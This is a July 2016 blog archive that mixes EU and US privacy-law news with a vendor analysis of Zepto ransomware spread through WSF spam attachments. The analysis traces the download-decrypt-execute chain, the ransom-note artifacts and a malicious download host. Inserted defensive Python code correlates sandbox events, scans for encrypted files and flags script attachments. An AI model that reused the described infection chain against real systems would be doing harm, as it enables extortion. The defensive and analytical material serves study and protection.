Monthly Archives: July 2016

Article 29 Working Party and EDPS Release Opinions on the ePrivacy Directive

On July 25, 2016, the Article 29 Working Party (the “Working Party”) and the European Data Protection Supervisor (“EDPS”) released their respective Opinions regarding the review of Directive 2002/58/EC on privacy and electronic communications (the “ePrivacy Directive”). Both the Working Party and the EDPS stressed that new rules should complement the protections available under the EU General Data Protection Regulation (“GDPR”).

These opinions are non-binding, but nevertheless indicate how regulators will seek to interpret the existing legal framework and influence the reformation of the future legal framework on ePrivacy matters.

The main recommendations of the Working Party with regard to the review of the ePrivacy Directive include:

  • Extended scope. The scope of the ePrivacy Directive should be extended from the traditional telecom providers to cover new types of Voice over IP services, including instant messaging, webmail and messaging in social networks. In addition, the Working Party recommends clarifying the definitions of “public electronic communications network” and “electronic communications services” to reflect the infrastructure of today’s communication networks. In addition, the Working Party recommends clarifying the term “publicly accessible private communication networks” to expand the application of the confidentiality protections of the ePrivacy Directive to all publicly available networks and services such as Wi-Fi services in hotels and shops, networks offered by universities and hotspots.
  • Confidentiality. According to the Working Party, the confidentiality protections of the ePrivacy Directive should be improved to protect users against interception of the content of their communication, regardless of whether it concerns direct electronic communications between users or within a defined users group (e.g., a conference call or webcast). Furthermore, interception should be interpreted broadly to include the injection of unique identifiers. Moreover, the Working Party recommends merging the currently separate provisions on traffic and location data to create a harmonized consent requirement for the processing of metadata.
  • Consent. Given the sensitive nature of communications data, the Working Party believes that prior user consent should remain a key principle in the ePrivacy context regarding the collection of metadata, content data and tracking techniques. To ensure consistency with the GDPR, the future ePrivacy framework should clearly refer to the GDPR provisions, specifying the definition, conditions and forms of the consent. According to the Working Party, “take it or leave it” approaches that do not give users free choice regarding processing rarely meet the requirements for freely given consent. Therefore, forced consent should be prohibited (e.g., tracking by unidentified third parties for unspecified purposes and non-granular consent bundled with multiple purposes). The Working Party recommends that instead of relying on website operators to obtain consent on behalf of third parties (such as advertising and social networks), manufacturers of browsers and other software or operating systems should be encouraged to offer Do Not Track controls to allow users to withdraw consent.
  • Cookies. According to the Working Party, the cookie rules should be rephrased to be as technologically neutral as possible in order to capture tracking techniques used on smartphones and Internet of Things applications, including ‘passive tracking.’ The Working Party seeks to ensure that the rules governing the collection of information from user devices do not depend on the kind of device owned by the user nor on the technology employed by an organization, especially with respect to the use of information for marketing and market analysis purposes. The cookie consent requirements should also apply when the data is not stored on the terminal equipment, but made available through the device and processed elsewhere. The Working Party nevertheless invites the European Commission to consider circumstances in which cookie consent will not be required due to the minor impact on the rights of users, such as when anonymization techniques are used to immediately and irreversibly anonymize data during collection on the device, or on the endpoints of the network or sensors.
  • Direct marketing. The Working Party recommends updating the rules on unsolicited communications to require prior consent of the user for sending any type of unsolicited communications independent of the means (e.g., electronic mail, behavioral advertising, voice or video calls, fax, text and direct-messaging). In addition, users must be able to revoke their consent easily and free of charge, without stating a reason, via simple means that have to be indicated in each subsequent communication. The commercial purpose of the communication should be clearly identified at the beginning of the communication. According to the Working Party, the currently applicable opt-out exception for sending marketing communications to existing customers for similar products and services should be limited to a reasonable amount of marketing communications so that senders do not bombard users with an excessive number of marketing calls or messages.
  • Deletion of specific data breach notification. The ePrivacy Directive contains sector-specific breach notification requirements applicable to telecom providers and Internet service providers. To avoid duplicative notifications, the Working Party recommends simplifying the process to require the notification of supervisory authorities under the GDPR regarding all data breaches involving personal data.
  • Enforcement. The Working Party believes it should be clarified that the supervisory authorities under the GDPR will also have jurisdiction on ePrivacy matters involving personal data to ensure consistent enforcement and harmonization of sanctions.

The EDPS makes similar recommendations as the Working Party with respect to the review of the ePrivacy Directive. In particular, the EDPS recommends that:

  • the scope of the ePrivacy Directive be extended to all forms of electronic communications irrespective of network or service used;
  • the updated rules should ensure that the confidentiality of users is protected on all publicly accessible networks;
  • no communications should be subject to unlawful tracking and monitoring without freely given consent, whether by cookies, device-fingerprinting or other technological means;
  • communications should not be tracked or monitored, except with users’ freely given consent;
  • the current consent requirement for traffic and location data should be strengthened;
  • the existing rules on unsolicited communications should be updated to strengthen the consent requirements; and
  • the future ePrivacy Directive provide specific rules enhancing transparency regarding government access requests, such as a requirement for organizations to periodically issue transparency reports on the amount of the law enforcement requests they receive in aggregate form.

Read the Opinion of the Article 29 Working Party.

Read the Opinion of the EDPS.

OCR Settles Two HIPAA Cases with Public Health Centers in Oregon and Mississippi

On July 21, 2016, the U.S. Department of Health and Human Services’ Office for Civil Rights (“OCR”) entered into resolution agreements with two large public health centers, Oregon Health & Science University (“OHSU”) and the University of Mississippi Medical Center (“UMMC”), over alleged HIPAA violations.

OHSU

Following the submission of multiple breach notification reports by OHSU in 2013, OCR investigated and found “evidence of widespread vulnerabilities within OHSU’s HIPAA compliance program.” These vulnerabilities included (1) storing electronic protected health information (“ePHI”) on a cloud-based server without entering into a business associate agreement (“BAA”) with the cloud provider; (2) conducting inadequate risk analyses; and (3) failing to implement a mechanism to encrypt and decrypt ePHI.

The resolution agreement requires OHSU to pay $2.7 million to OCR and enter into a Corrective Action Plan that obligates OHSU to:

  • conduct an accurate and thorough risk assessment of the potential risks and vulnerabilities to the confidentiality, integrity and availability of ePHI held by OHSU;
  • develop a comprehensive risk management plan to address those risks and vulnerabilities identified in the risk analysis;
  • implement a mobile device management solution to encrypt all OHSU-owned and personally-owned mobile devices that access ePHI;
  • provide security awareness training to its workforce;
  • report any events of noncompliance with its HIPAA policies and procedures; and
  • submit annual compliance reports to OCR for a period of three years.

In announcing the settlement with OHSU, OCR Director Jocelyn Samuels noted that “OHSU had every opportunity to address security management processes that were insufficient.” She also stated that “[t]his settlement underscores the importance of leadership engagement and why it is so critical for the C-suite to take HIPAA compliance seriously.”

UMMC

The UMMC settlement also stemmed from a breach in 2013 that affected approximately 10,000 individuals. OCR’s investigation revealed that UMMC had failed to conduct any significant risk management activity despite being aware of certain risks and vulnerabilities to ePHI dating back to 2005. The investigation also noted that UMMC had failed to (1) implement policies and procedures to prevent, detect, contain and correct security violations; (2) implement physical safeguards for workstations that access ePHI; (3) assign a unique username or number to identify and track user identity in information systems that contain ePHI; and (4) notify each individual whose ePHI was affected by the breach.

The resolution agreement requires UMMC to pay $2.75 million to OCR and enter into a Corrective Action Plan that obligates UMMC to:

  • designate an internal monitor to review UMMC’s compliance with the Corrective Action Plan and submit reports to OCR;
  • draft an enterprise-wide risk analysis and risk management plan;
  • update its Information Security Policy to comply with the HIPAA Security Rule;
  • revise its breach notification policy;
  • develop a plan to require a unique username and/or number to track users in systems that access ePHI;
  • provide security awareness training to its workforce;
  • report any events of noncompliance with its HIPAA policies and procedures; and
  • submit annual compliance reports to OCR for a period of three years.

In announcing the settlement with UMMC, OCR Director Jocelyn Samuels stated that “[i]n addition to identifying risks and vulnerabilities to their ePHI, entities must also implement reasonable and appropriate safeguards to address them within an appropriate time frame.”

The two OCR settlements this July continue an active year by OCR in HIPAA enforcement. We wrote about prior OCR settlements in June, April and March of this year.

White House Releases New Policy on Federal Cyber Incident Response

On July 26, 2016, the White House unveiled Presidential Policy Directive PPD-41 (“PPD-41”), Subject: United States Cyber Incident Coordination, which sets forth principles for federal responses to cyber incidents approved by the National Security Council (“NSC”). Coming on the heels of several high-profile federal breaches, including the Office of Personnel Management’s loss of security clearance information and the hack of over 700,000 IRS accounts, PPD-41 is a component of President Obama’s Cybersecurity National Action Plan. PPD-41 first focuses on incident response to cyber attacks on government assets, but also outlines federal incident responses to cyber attacks on certain critical infrastructure within the private sector.

PPD-41 groups federal incident response into two broad categories, cyber incidents and significant cyber incidents. PPD-41 directs the first federal agency that detects a cyber incident, under the direction of the Department of Justice (“DOJ”) and the Department of Homeland Security (“DHS”), to “rapidly notify” relevant agencies. According to PPD-41, the federal government typically will not play a role in responding to cyber incidents involving private sector entities, beyond remaining “cognizant” of entities’ responses.

However, PPD-41 lays out a more robust response for cyber incidents that have significant impacts on an entity, national security or the broader economy, noting that such incidents require a unique approach to response efforts. To that end, PPD-41 outlines a coordinated federal response to significant cyber incidents through the use of a Cyber Unified Coordination Group (“Cyber UCG”), which is defined as a response coalition made up of relevant federal agencies and private sector partners.

In order to ensure streamlined national operational coordination by a Cyber UCG, PPD-41 appoints specific federal agencies as leading coordinators for three key components of incident response:

  • Threat Response: Activities include collecting evidence, investigative activity and identifying affected entities. PPD-41 directs that DOJ, acting through the FBI and the National Cyber Investigative Joint Task Force, be the federal lead agency for threat response activities.
  • Asset Response: Activities include offering technical support to affected entities, mitigating vulnerabilities and reducing the impact of cyber incidents. PPD-41 directs that DHS lead these efforts in a Cyber UCG, acting in coordination with the National Cybersecurity and Communications Integration Center.
  • Intelligence Support: Activities include analysis of threat trends, information sharing and mitigating threat capabilities. PPD-41 establishes the Office of the Director of National Intelligence to act as the lead federal agency for intelligence support within a Cyber UCG.

Upon formation of a Cyber UCG, PPD-41 directs that federal agencies assign appropriate senior executives, staff and resources to execute the agency’s responsibilities as part of a Cyber UCG. The Cyber UCG is intended to result in unity of effort and not to alter agency authorities or leadership, oversight or command responsibilities.

Under PPD-41, such a Cyber UCG can be formed at the direction of the NSC, the Cyber Response Group (to which PPD-41 also assigns the responsibility of leading federal policy on cyber incident response) and sector-specific agencies. However, PPD-41 also directs the formation of Cyber UCGs where a significant cyber incident “could reasonably result in catastrophic regional or national effects on public health or safety, economic security, or national security.” Notably, this builds off of President Obama’s Executive Order 13636 (“Improving Critical Infrastructure Cybersecurity”), which calls for the identification of “Critical Infrastructure at Greatest Risk” using similar criteria.

In sum, PPD-41 seeks to improve the federal government’s response to cyber incidents. Owner/operators of critical infrastructure labeled “Critical Infrastructure at Greatest Risk” under Executive Order 13636 should be aware that a significant cyber incident involving such assets could activate a Cyber UCG under PPD-41. Building early relationships with key federal agencies can help such private sector entities effectively work with a Cyber UCG in the event of cyber attack.

Lisa Sotto Interviewed on Privacy Piracy Radio Show

On July 25, 2016, Lisa Sotto, partner and head of the Global Privacy and Cybersecurity practice at Hunton & Williams LLP, was interviewed on KUCI 88.9 FM radio’s Privacy Piracy show. Lisa discussed the changing regulatory landscape, information security enforcement actions, the threat actors who attack companies’ data and how to manage the aftermath of a data breach. “There is no industry sector that is exempt [from being targeted],” Lisa says. She notes that, because “data can be sold for a monetary sum, data is now the equivalent of cash.”

Listen to the full interview.

U.S. Department of Commerce Launches Privacy Shield Website

On July 26, 2016, the U.S. Department of Commerce announced that it has launched a new website that provides individuals and companies with additional information regarding the EU-U.S. Privacy Shield Framework (“Privacy Shield”). Among other things, the website provides information about complying with, and self-certifying to, the Privacy Shield’s principles. The Department of Commerce’s website will begin accepting certifications on August 1, 2016.

EU Regulators Will Not Challenge Adequacy of Privacy Shield for at Least One Year

On July 26, 2016, Isabelle Falque-Pierrotin, the Chairwoman of the Article 29 Working Party of data protection regulators, announced that EU data protection regulators will not challenge the adequacy of the EU-U.S. Privacy Shield (“Privacy Shield”) for at least one year (i.e., until after summer 2017). The European Commission is scheduled to conduct a mandatory review of the adequacy of the Privacy Shield by May 2017.

As we recently reported, on July 12, 2016, the European Commission and the U.S. Department of Commerce announced the formal adoption of the Privacy Shield framework, composed of an Adequacy Decision and accompanying Annexes.

The Privacy Shield is designed to protect the fundamental rights of individuals whose personal data is transferred to the U.S. and ensure legal certainty for businesses with respect to transatlantic transfers of personal data.

The EU-U.S. Privacy Shield: A How-To Guide

On July 12, 2016, after months of negotiations and criticism, the EU-U.S. Privacy Shield (“Privacy Shield”) was officially adopted by the European Commission and the Department of Commerce. Similar to the Safe Harbor, companies must certify their compliance with the seven principles comprising the Privacy Shield to use the Shield as a valid data transfer mechanism. Hunton & Williams partner Lisa J. Sotto and associate Chris D. Hydak recently published an article in Law360 entitled “The EU-U.S. Privacy Shield: A How-To Guide.” In the article, Lisa and Chris detail the Privacy Shield principles, the benefits of certification, how the Shield will be enforced, and the challenges and risks associated with the future of the Privacy Shield.

Read the full article.

Infosec Writers

Got a topic you've become very knowledgeable about and would like to share your expertise? Want to add to the cumulative knowledge base of InfoSec/NetSec? You can write and upload your paper(s) to infosecwriters.com, and if it meets their criteria for suitability, have it published on their site.

http://infosecwriters.com/

CNIL Serves Formal Notice to Microsoft to Comply with French Data Protection Law

On July 20, 2016, the French Data Protection Authority (“CNIL”) announced that it issued a formal notice to Microsoft Corporation (“Microsoft”) about Windows 10, ordering Microsoft to comply with the French Data Protection Act within three months.

Background

Following the launch of Microsoft’s new operating system, Windows 10, in July 2015, the CNIL was alerted by the media and political parties that Microsoft could collect excessive personal data via Windows 10. A group composed of several EU data protection authorities was created within the Article 29 Working Party to examine the issue and conduct investigations in their relevant EU Member States. The CNIL initiated its investigation and carried out seven online inspections in April and June 2016. The CNIL also questioned Microsoft on certain points of its privacy statement.

CNIL Formal Notice

In its formal notice, the CNIL found that Windows 10 showed several breaches of the French Data Protection Act as amended, including:

  • Breach of the Data Proportionality Requirement. As a general rule, personal data must be appropriate, relevant and not excessive with respect to the purposes for which the data is collected and further processed (i.e., data proportionality). The CNIL found that Microsoft was collecting irrelevant or excessive telemetry data. According to Microsoft’s privacy statement, diagnostic and usage data are collected via Microsoft’s telemetry service, among other things, to identify troubleshooting problems and to improve Microsoft products and services. Users cannot deactivate the telemetry service but can opt to set their devices to the basic level of diagnostic and usage data. Such data is described as vital to the operation of Windows. The CNIL found that most of this data was not directly necessary for the system to operate and thus, Microsoft was collecting excessive personal data.
  • Breach of the Notice Requirement. The French Data Protection Act requires data controllers to include minimum privacy language directly on the form used to collect information. Further, the French Implementing Decree requires data controllers to provide detailed information on international data transfers (including the types of the personal data transferred, the purpose(s) of the data transfer, etc.). The CNIL found that the form for creating a Microsoft account did not contain any privacy language and that Microsoft’s privacy statement did not provide all the information required about the data transfers.
  • Breach of the Cookie Law Rules. Under the French Data Protection Act, users’ consent must be obtained before accessing or recording data in their devices. The CNIL found that Microsoft was generating a unique advertising ID that was activated by default when Windows 10 was installed, thereby allowing Windows apps and third-party apps to monitor user browsing and provide targeted advertising without the user’s prior consent. The CNIL further found that 13 cookies (including advertising cookies) were placed on the user’s device when clicking on the link to Microsoft’s privacy statement. These cookies were placed without informing users in advance of (1) the purposes of the cookies, and (2) how to block them. Additionally, the CNIL found that Microsoft’s privacy statement simply referred to browser settings to block cookies. Browser settings cannot be considered a valid mechanism to block cookies where the site places technical cookies that are essential for its operation and first-party cookies requiring users’ consent (as was the case here). The CNIL concluded that Microsoft was not complying with the cookie law requirements.
  • Breach of the Data Security Requirement. The French Data Protection Act also requires data controllers to take all necessary measures to ensure the security of the personal data. The CNIL observed that Windows 10 users were prompted to create a PIN for their device to authenticate themselves for all of Microsoft’s online services, including access to their email and Microsoft account, which lists store purchases and the payment options used. The CNIL further observed that the PIN code could be composed of four identical figures (e.g., “0000”) and the number of attempts to enter the PIN was unlimited. According to the CNIL, this implies that user data was not secure.
  • Breach of the Registration Requirement. According to the French Data Protection Act, processing personal data for fraud prevention purposes requires the CNIL’s prior authorization. Microsoft’s privacy statement specifies that user data may be processed for these purposes. However, Microsoft did not file an authorization request for implementing the data processing, thereby infringing the French registration requirements.
  • Breach of the Cross-Border Data Transfer Restrictions. Finally, since the invalidation by the Court of Justice of the European Union of the European Commission Decision on the Safe Harbor framework, data transfers based on that framework are unlawful. Microsoft’s privacy statement still refers to Microsoft’s Safe Harbor certification, which, according to the CNIL, constitutes a breach of the cross-border data transfer restrictions.

Next Steps

The CNIL ordered Microsoft to cease its non-compliance within three months. Failure to do so within the prescribed time limit may result in a fine of up to €150,000 (under the current regime) or up to €3 million (when the French ‘Digital Republic’ law amending the French Data Protection Act becomes effective – possibly in September or October 2016). Microsoft has already announced that it will release an updated privacy statement next month referring to the EU-U.S. Privacy Shield.

Zepto Ransomware Packed into WSF Spam

ThreatTrack Labs has recently observed a surge of spam containing a zip attachment with a WSF (Windows Scripting File) to deliver Zepto ransomware. This tactic is a change from the JavaScript attachments and macro documents that were being spammed previously.

Here are actual emails featuring familiar social engineering tactics:

[Screenshots: three spam emails carrying infected WSF attachments]

The zip attachments contain the WSF.

[Screenshot: the infected WSF file inside the zip attachment]

An Interactive Analysis with ThreatAnalyzer

To see what we’re dealing with, we turned to ThreatTrack’s malware analysis sandbox ThreatAnalyzer.

We extracted the WSF, submitted it to ThreatAnalyzer and generated the following threat analysis:

[Screenshot: ThreatAnalyzer threat analysis of the WSF]

Since this is a script, we are more concerned with the call tree from WScript.exe. One notable result, encircled above, is the number of modified files. This strongly indicates that the sample is either a virus or ransomware, and considering the proliferation of ransomware attacks lately, that is our biggest concern.

There are two captured screenshots from our analysis.

[Screenshot: Zepto ransomware infection screen captured in the sandbox]

Expanding the MODIFIED FILES shows this result.

[Screenshot: list of modified files]

The files affected are renamed with a “.zepto” filename extension.

Given the screenshot and Modified Files artifacts, we can confidently say that this is a variant of the Zepto ransomware.

The WSF Script Behavior

Selecting C:\Windows\System32\WScript.exe (3388) shows the behaviors performed by the WSF alone.

[Screenshots: sandbox behavior results for WScript.exe (3388)]

It shows that the script created two files and made an HTTP connection to mercumaya.net.

Let’s look at the two files in the Temp folder.

This is the binary view of the UL43Fok40ii file.

[Screenshot: binary view of the encrypted UL43Fok40ii file]

This is the UL43Fok40ii.exe file, a complete PE executable.

[Screenshot: UL43Fok40ii.exe PE file and process analysis]

The two files differ by only 4 bytes in size (208,008 bytes and 208,004 bytes), which suggests that the file without the .exe filename extension was decrypted to form the PE executable. Afterwards, the PE executable was run by the WSF script with the argument “321”.

[Screenshot: sandbox record of the PE executable launched with argument 321]

Expanding the Network connections.

[Screenshots: network connections made by the WSF script]

With the com.my suffix from the resolved host, the server seems to be located in Malaysia.

The HTTP header also indicates that the Content-Length was 208,008 bytes. This is the same size as the encrypted file.

The WSF file executed by WScript.exe simply downloaded a Windows PE file, decrypted it and then executed it.
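The download, decrypt-in-place and execute chain above is easy to recognise once sandbox events are correlated per process. The following is an added example (not ThreatTrack's or ThreatAnalyzer's code) that does that over a constructed event list; the event schema, the victim path and the .wsf name are assumptions, while the file names, sizes, host and argument mirror the observations on this page.

```python
"""Correlate sandbox events into the chain described above: a script host
downloads a blob, decrypts it in place to a PE of almost the same size, and
runs it. Event schema and sample values are constructed for this example
(file names, sizes, host and argument mirror the page's observations)."""
import ntpath
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".wsf", ".js", ".jse", ".vbs", ".vbe")
MAX_SIZE_DELTA = 16  # decrypted PE is expected to be within a few bytes of the blob


@dataclass
class Finding:
    script_pid: int
    blob: str
    exe: str
    size_delta: int
    http_match: bool = False
    executed_args: Optional[str] = None
    indicators: List[str] = field(default_factory=list)


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def analyze(events: List[Dict]) -> List[Finding]:
    """Return one Finding per (blob, blob.exe) pair written by a script host."""
    findings: List[Finding] = []
    # 1. Script hosts (WScript/CScript) whose command line names a script file.
    script_pids = {
        e["pid"] for e in events
        if e["type"] == "process_create"
        and _base(e["image"]) in SCRIPT_HOSTS
        and e.get("cmdline", "").lower().rstrip('" ').endswith(SCRIPT_EXTS)
    }
    for pid in sorted(script_pids):
        writes = {e["path"]: e["size"] for e in events
                  if e["type"] == "file_create" and e["pid"] == pid}
        lengths = {e.get("content_length") for e in events
                   if e["type"] == "http" and e["pid"] == pid}
        children = {ntpath.normcase(e["image"]): e.get("cmdline", "") for e in events
                    if e["type"] == "process_create" and e.get("parent_pid") == pid}
        # 2. A written file whose sibling is the same name plus ".exe", nearly equal in size.
        for path, size in writes.items():
            exe_path = path + ".exe"
            if exe_path not in writes:
                continue
            delta = abs(size - writes[exe_path])
            if delta > MAX_SIZE_DELTA:
                continue
            f = Finding(pid, path, exe_path, delta)
            f.indicators.append("blob decrypted in place to a PE (size delta %d bytes)" % delta)
            # 3. The blob's size equals an HTTP response body the script fetched.
            if size in lengths:
                f.http_match = True
                f.indicators.append("blob size equals HTTP Content-Length")
            # 4. The script host then launched the decrypted executable.
            if ntpath.normcase(exe_path) in children:
                f.executed_args = children[ntpath.normcase(exe_path)]
                f.indicators.append("script host executed the decrypted PE")
            findings.append(f)
    return findings


# Constructed sample mirroring the page: WScript.exe (3388), the Temp pair
# UL43Fok40ii / UL43Fok40ii.exe (208,008 vs 208,004 bytes), the GET to
# mercumaya.net and the launch with argument "321". The .wsf name is invented.
TEMP = r"C:\Users\victim\AppData\Local\Temp"
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 3388, "parent_pid": 2000,
     "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\victim\Downloads\invoice.wsf"'},
    {"type": "http", "pid": 3388, "method": "GET", "host": "mercumaya.net",
     "content_length": 208008},
    {"type": "file_create", "pid": 3388, "path": TEMP + r"\UL43Fok40ii", "size": 208008},
    {"type": "file_create", "pid": 3388, "path": TEMP + r"\UL43Fok40ii.exe", "size": 208004},
    {"type": "process_create", "pid": 3412, "parent_pid": 3388,
     "image": TEMP + r"\UL43Fok40ii.exe", "cmdline": "321"},
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

The same three-indicator rule can be fed from any sandbox or EDR export that records process creation, file writes and HTTP responses with their parent process.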

The Downloaded Executable PE file

Now we turn our focus on the behavior of the executable file UL43Fok40ii.exe.

[Screenshots: ThreatAnalyzer behavior summary for UL43Fok40ii.exe]

  • Posted some info to a server somewhere in Ukraine.
  • Accessed hundreds of files.
  • Executed the default browser (Chrome was set as the default browser).
  • Deleted a file using cmd.exe.
  • Connected to shares.
  • Dropped the ransom instructions (_HELP_instructions.html). For every folder where a file got encrypted for ransom, a copy of _HELP_instructions.html is created.
  • Created 10 threads.

The data posted to the Ukraine site is encrypted. Most likely this contains the ID and key used to encrypt the files.

[Screenshot: raw data posted to the server]

ThreatAnalyzer displays the raw data in hexadecimal form. A partially converted version of the raw data is shown below:

[Screenshot: partially converted view of the posted data]

This malware also renamed a lot of files. This is the encryption behavior: each file is encrypted and renamed to a GUID filename with a “.zepto” filename suffix.

[Screenshot: file rename events]

When searching for files, it first targets the phone book file before traversing from the root directory of the drive.

[Screenshot: file search order]

Some notable files were also created. The captured screenshot shows the contents of the _HELP_instructions.bmp file.

[Screenshot: _HELP_instructions.bmp]

This malware sample attempts to move its running executable to a file in the Temp folder.

[Screenshot: executable moved to the Temp folder]

With Chrome set as the default browser, the malware opens the _HELP_instructions.html file that it previously created on the Desktop. It also deletes the malware copy from the Temp folder, probably as part of its clean-up phase.

[Screenshot: browser launch and Temp file deletion]

Here’s what _HELP_instructions.html looks like when opened in a browser.

[Screenshot: _HELP_instructions.html rendered in a browser]

The process call tree under Chrome.exe is most likely invoked by the browser and not part of this malware.
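The two on-disk artifacts described above (GUID-style names with a “.zepto” suffix, and a copy of _HELP_instructions.html in every folder that lost files) are what an incident responder scopes first. This added example, not part of the original post, walks a tree and reports both per folder; the exact name pattern is an assumption drawn from the page's “GUID filename” description, and the victim tree is constructed in a temporary directory.

```python
"""Triage scanner for the encryption artifacts described above: GUID-style
file names with a .zepto suffix and a _HELP_instructions.* ransom note per
affected folder. Added example; the name pattern is an assumption drawn from
the page's "GUID filename" description, and the victim tree is constructed."""
import os
import re
import tempfile
from typing import Dict, Tuple

# 8-16 hex chars, three 4-char groups, a 12-char group, then .zepto (assumed).
ZEPTO_NAME = re.compile(r"^[0-9a-f]{8,16}(-[0-9a-f]{4}){3}-[0-9a-f]{12}\.zepto$", re.I)
RANSOM_NOTES = {"_help_instructions.html", "_help_instructions.bmp"}


def scan_tree(root: str) -> Dict[str, dict]:
    """Walk root and report, per folder, renamed files and ransom notes found."""
    report: Dict[str, dict] = {}
    for dirpath, _dirs, files in os.walk(root):
        encrypted = [f for f in files if ZEPTO_NAME.match(f)]
        notes = sorted(f for f in files if f.lower() in RANSOM_NOTES)
        if encrypted or notes:
            report[os.path.relpath(dirpath, root)] = {
                "encrypted": len(encrypted),
                "notes": notes,
                # A note with no encrypted siblings (e.g. the Desktop copy the
                # malware opens in the browser) is still evidence of the run.
                "note_without_encryption": bool(notes) and not encrypted,
            }
    return report


def summarize(report: Dict[str, dict]) -> Dict[str, int]:
    """Roll the per-folder report up into scope numbers for an IR ticket."""
    return {
        "encrypted_files": sum(v["encrypted"] for v in report.values()),
        "folders_with_encryption": sum(1 for v in report.values() if v["encrypted"]),
        "folders_with_note": sum(1 for v in report.values() if v["notes"]),
    }


def build_sample_tree(root: str) -> None:
    """Constructed victim tree: Documents encrypted with a note, Pictures
    untouched, Desktop holding only the html and bmp notes."""
    docs, pics, desk = (os.path.join(root, d) for d in ("Documents", "Pictures", "Desktop"))
    for d in (docs, pics, desk):
        os.makedirs(d)
    for name in ("024BCD33B9A7A19A-6BF5-2D6E-59B6-3F0C8A1F9F7E.zepto",
                 "024BCD33B9A7A19A-1A2B-3C4D-5E6F-7A8B9C0D1E2F.zepto",
                 "_HELP_instructions.html"):
        open(os.path.join(docs, name), "wb").close()
    open(os.path.join(pics, "holiday.jpg"), "wb").close()
    for name in ("_HELP_instructions.html", "_HELP_instructions.bmp"):
        open(os.path.join(desk, name), "wb").close()


def demo() -> Tuple[Dict[str, dict], Dict[str, int]]:
    """Build the sample tree in a temp dir, scan it and return (report, summary)."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        report = scan_tree(root)
    return report, summarize(report)


if __name__ == "__main__":
    for folder, info in demo()[0].items():
        print(folder, info)
    print(demo()[1])
```

Run scan_tree against a mounted image or a share root to get the same per-folder view; folders that carry a note but no renamed files usually mark where the run was interrupted or where the malware only dropped its notice.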

Prevent Ransomware

Syndicates behind today’s ransomware like Zepto are aggressively finding various ways of infiltrating businesses and government organizations alike. In this case, they attacked using Windows Scripting Files in the hope of passing through email gateways that do not block WSF files in attachments.
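Gateways that only look at the attachment's own extension miss a script packed inside a zip. The following is an added example, not ThreatTrack's own gateway logic, of an attachment check that opens zip attachments (one level of nesting) and flags script-type members; the extension list, nesting limit and the constructed lure zip are assumptions.

```python
"""Mail-gateway style check for the tactic above: a zip attachment carrying a
Windows Script File. Added example; the extension list and nesting limit are
assumptions, and the sample attachment is constructed in memory."""
import io
import zipfile
from typing import List

SCRIPT_EXTS = (".wsf", ".js", ".jse", ".vbs", ".vbe", ".hta", ".wsh")
MAX_DEPTH = 1  # look inside one level of nested archives


def find_script_members(data: bytes, depth: int = 0, prefix: str = "") -> List[str]:
    """Return member paths (nested paths joined with '!') that are script files."""
    hits: List[str] = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return hits  # not a zip (or corrupt): nothing to inspect here
    with zf:
        for info in zf.infolist():
            lower = info.filename.lower()
            if lower.endswith(SCRIPT_EXTS):
                hits.append(prefix + info.filename)
            elif lower.endswith(".zip") and depth < MAX_DEPTH:
                hits.extend(find_script_members(zf.read(info), depth + 1,
                                                prefix + info.filename + "!"))
    return hits


def should_quarantine(attachment: bytes) -> bool:
    """Policy decision: any script member anywhere in the archive is enough."""
    return bool(find_script_members(attachment))


def build_sample_attachment() -> bytes:
    """Constructed lure: an outer zip holding a nested zip with the WSF inside.
    The double extension imitates the 'looks like a document' trick."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice_2016-07.pdf.wsf",
                    "<job><script language='JScript'>/* placeholder */</script></job>")
        zf.writestr("readme.txt", "please see attached")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("inner.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    sample = build_sample_attachment()
    print(find_script_members(sample), should_quarantine(sample))
```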

To protect your organization, deploy solutions that protect you from sophisticated and pervasive threats like ransomware, including advanced endpoint protection like VIPRE Endpoint Security, a malware behavior analysis tool like ThreatAnalyzer, and solutions to detect and disrupt active cyber attacks like ThreatSecure. And regularly back up all your critical data.

VIPRE antivirus detections for this threat include Trojan.Locky.AX and Trojan.Win32.Generic!BT.


Advocate General Finds Member States May Not Breach EU Laws Over Electronic Communications Retention

On July 19, 2016, Advocate General Saugmandsgaard Oe (“Advocate General”) published his Opinion on two joined cases relating to data retention requirements in the EU, C-203/15 and C-698/15. These cases were brought following the Court of Justice of the European Union’s (“CJEU’s”) decision in the Digital Rights Ireland case, which invalidated Directive 2006/24/EC on data retention. The two cases, referred from courts in Sweden and the UK respectively, sought to establish whether a general obligation to retain data is compatible with the fundamental rights to privacy and data protection under EU law.

In his Opinion, the Advocate General stresses the need to balance a nation’s need to effectively fight serious crime, such as terrorism, against individuals’ fundamental rights. The Advocate General found that a general obligation to retain data may be compatible with EU law, although any action by an EU Member State to impose such an obligation is subject to strict requirements. The national courts are responsible for determining whether or not such requirements are satisfied. The Advocate General set out the following interpretations of the requirements:

  • the general obligation to retain data and the accompanying guarantees must be laid down by legislation or regulatory measures;
  • the obligation must respect the essence of the right to respect for private life and the right to the protection of personal data laid down by the European Charter for Human Rights;
  • any interference with the fundamental rights should be in pursuit of an objective in the general interest (which the Advocate General opined could be satisfied only by the fight against serious crime);
  • the general obligation to retain data must be strictly necessary to the fight against serious crime; and
  • the general obligation must be proportionate.

While the Advocate General’s Opinion is not binding on the CJEU, the court’s judgments have historically tended to follow the Advocate General’s stated views.

Second Circuit Holds Microsoft Cannot Be Compelled to Turn Over Emails Stored Abroad

This post has been updated. 

On July 14, 2016, the U.S. Court of Appeals for the Second Circuit held that Microsoft Corporation (“Microsoft”) cannot be compelled to turn over customer emails stored abroad to U.S. law enforcement authorities.

